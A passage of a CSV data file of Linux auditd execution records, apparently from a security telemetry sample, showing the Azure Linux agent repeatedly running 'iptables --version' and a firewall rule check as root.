+80,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505692.500:9078002,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=564a488997e0', 'a1=564a48899728', 'a2=564a488997b0', 'a3=7fada9506810', 'items=2', 'ppid=28141', 'pid=28142', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+81,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505697.508:9078003,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e55870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28144', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+82,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505697.508:9078004,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55bb25f03bb8', 'a1=55bb25f03b70', 'a2=55bb25f03b88', 'a3=7f69791f7810', 'items=2', 'ppid=28144', 'pid=28145', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+83,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505697.512:9078005,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e55870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28146', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+84,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505697.516:9078006,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55601be657e0', 'a1=55601be65728', 'a2=55601be657b0', 'a3=7eff45e52810', 'items=2', 'ppid=28146', 'pid=28147', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+85,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505702.524:9078007,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e5cdd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28152', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+86,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505702.536:9078008,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5580da979bb8', 'a1=5580da979b70', 'a2=5580da979b88', 'a3=7f7e19d18810', 'items=2', 'ppid=28152', 'pid=28153', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+87,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505702.544:9078009,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e5cdd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28154', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+88,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505702.544:9078010,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=56097cb957e0', 'a1=56097cb95728', 'a2=56097cb957b0', 'a3=7fe45dfc1810', 'items=2', 'ppid=28154', 'pid=28155', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+89,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505707.552:9078011,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e5c9b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28157', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+90,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505707.556:9078012,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=559433af5bb8', 'a1=559433af5b70', 'a2=559433af5b88', 'a3=7fefece1c810', 'items=2', 'ppid=28157', 'pid=28158', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+91,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505707.560:9078013,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e5c9b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28159', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+92,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505707.560:9078014,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55b336f247e0', 'a1=55b336f24728', 'a2=55b336f247b0', 'a3=7f5f4d878810', 'items=2', 'ppid=28159', 'pid=28160', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+93,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505712.568:9078015,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c0fddd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28162', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+94,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505712.572:9078016,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=563f5c243bb8', 'a1=563f5c243b70', 'a2=563f5c243b88', 'a3=7f4489462810', 'items=2', 'ppid=28162', 'pid=28163', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+95,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505712.576:9078017,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c0fddd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28164', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+96,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505712.576:9078018,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55e169de57e0', 'a1=55e169de5728', 'a2=55e169de57b0', 'a3=7f1c16840810', 'items=2', 'ppid=28164', 'pid=28165', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+97,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505717.588:9078019,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c0fddb0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28166', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 